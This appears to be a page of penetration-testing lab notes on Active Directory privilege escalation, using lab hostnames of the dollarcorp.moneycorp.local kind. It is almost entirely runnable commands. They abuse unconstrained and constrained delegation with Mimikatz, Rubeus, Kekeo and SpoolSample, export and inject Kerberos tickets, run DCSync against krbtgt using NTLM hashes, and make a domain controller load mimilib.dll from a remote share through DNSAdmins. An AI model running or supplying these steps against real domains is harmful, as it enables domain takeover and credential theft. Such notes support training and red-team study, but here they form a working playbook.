Domain Privilege Escalation

Unconstrained Delegation

Discover domain computers which have unconstrained delegation 
enabled using PowerView:

Get-NetComputer -UnConstrained


• Using ActiveDirectory module:
Get-ADComputer -Filter {TrustedForDelegation -eq $True}

Get-ADUser -Filter {TrustedForDelegation -eq $True}

We must trick or wait for a domain admin to connect a service on 
appsrv. 

• Now, if the command is run again:

Invoke-UserHunter -ComputerName dcorp-appsrv -Poll 100 -UserName Administrator -Delay 5 -Verbose

Invoke-Mimikatz –Command '"sekurlsa::tickets /export"'


• The DA token could be reused:
Invoke-Mimikatz -Command '"kerberos::ptt
C:\Users\appadmin\Documents\user1\[0;2ceb8b3]-2-0-60a10000-Administrator@krbtgtDOLLARCORP.MONEYCORP.LOCAL.kirbi"'

Printerbug

We can capture the TGT of dcorp-dc$ by using Rubeus 
(https://github.com/GhostPack/Rubeus) on machine having unconstrain deligation:

  .\Rubeus.exe monitor /interval:5 /nowrap

• And after that run MS-RPRN.exe 

(https://github.com/leechristensen/SpoolSample) on the student VM:

.\MS-RPRN.exe \\dcorp-dc.dollarcorp.moneycorp.local 
\\dcorp-appsrv.dollarcorp.moneycorp.local

Copy the base64 encoded TGT, remove extra spaces (if any) and use it 
on the student VM:

.\Rubeus.exe ptt /ticket: 

• Once the ticket is injected, run DCSync:
Invoke-Mimikatz -Command '"lsadump::dcsync
/user:dcorp\krbtgt"'

Constrained Delegation

Enumerate users and computers with constrained delegation enabled
• Using PowerView (dev)

Get-DomainUser –TrustedToAuth
Get-DomainComputer –TrustedToAuth


• Using ActiveDirectory module:

Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo


Either plaintext password or NTLM hash is required. We already have 
access to websvc's hash from dcorp-adminsrv

• Using asktgt from Kekeo, we request a TGT (steps 2 & 3 in the diagram):

kekeo# tgt::ask /user:websvc /domain:dollarcorp.moneycorp.local /rc4:cc098f204c5887eaa8253e7c2749156f

Using s4u from Kekeo, we request a TGS (steps 4 & 5):

tgs::s4u
/tgt:TGT_websvc@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollar
corp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL.kirbi
/user:Administrator@dollarcorp.moneycorp.local
/service:cifs/dcorp-mssql.dollarcorp.moneycorp.LOCAL

Using mimikatz, inject the ticket:
Invoke-Mimikatz -Command '"kerberos::ptt
TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.
MONEYCORP.LOCAL_cifs~dcorpmssql.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LO
CAL.kirbi"'
ls \\dcorp-mssql.dollarcorp.moneycorp.local\c$

To abuse Constrained delegation using Rubeus, we can use the following 
command (We are requesting a TGT and TGS' in a single command):

.\Rubeus.exe s4u /user:websvc
/rc4:cc098f204c5887eaa8253e7c2749156f
/impersonateuser:Administrator /msdsspn:"CIFS/dcorpmssql.dollarcorp.moneycorp.LOCAL" /ptt
ls \\dcorp-mssql.dollarcorp.moneycorp.local\c$

Either plaintext password or NTLM hash is required. If we have access to 
dcorp-adminsrv hash
• Using asktgt from Kekeo, we request a TGT:

tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local
/rc4:1fadb1b13edbc5a61cbdc389e6f34c67

Using s4u from Kekeo_one (no SNAME validation):
tgs::s4u /tgt:TGT_dcorpadminsrv$@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.m
oneycorp.local@DOLLARCORP.MONEYCORP.LOCAL.kirbi
/user:Administrator@dollarcorp.moneycorp.local
/service:time/dcorpdc.dollarcorp.moneycorp.LOCAL|ldap/dcorpdc.dollarcorp.moneycorp.LOCAL

Using mimikatz:
Invoke-Mimikatz -Command '"kerberos::ptt
TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.
MONEYCORP.LOCAL_ldap~dcorpdc.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL
_ALT.kirbi"'
Invoke-Mimikatz -Command '"lsadump::dcsync
/user:dcorp\krbtgt"'

To abuse constrained delegation for dcorp-adminsrv$ using Rubeus, we 
can use the following command (We are requesting a TGT and TGS' in a 
single command):
.\Rubeus.exe s4u /user:dcorp-adminsrv$ /rc4:1fadb1b13edbc5a61cbdc389e6f34c67
/impersonateuser:Administrator /msdsspn:"time/dcorpdc.dollarcorp.moneycorp.LOCAL" /altservice:ldap /ptt
• After injection, we can run DCSync:
Invoke-Mimikatz -Command '"lsadump::dcsync
/user:dcorp\krbtgt"'

DNSAdmins

Enumerate the members of the DNSAdmis group
Get-NetGroupMember -GroupName "DNSAdmins" 

• Using ActiveDirectory module
Get-ADGroupMember -Identity DNSAdmins

From the privileges of DNSAdmins group member, configure DLL using 
dnscmd.exe (needs RSAT DNS):
dnscmd dcorp-dc /config /serverlevelplugindll
\\172.16.50.100\dll\mimilib.dll 

• Using DNSServer module (needs RSAT DNS):
$dnsettings = Get-DnsServerSetting -ComputerName dcorp-dc -
Verbose -All
$dnsettings.ServerLevelPluginDll = "\\172.16.50.100\dll\mimilib.dll"
Set-DnsServerSetting -InputObject 

$dnsettings -ComputerName
dcorp-dc -Verbose

Restart the DNS service (assuming that the DNSAdmins group has the permission to 
do so):
sc \\dcorp-dc stop dns
sc \\dcorp-dc start dns
PreviousDomain EnumerationsNextAttacks on AD Authentication

Last updated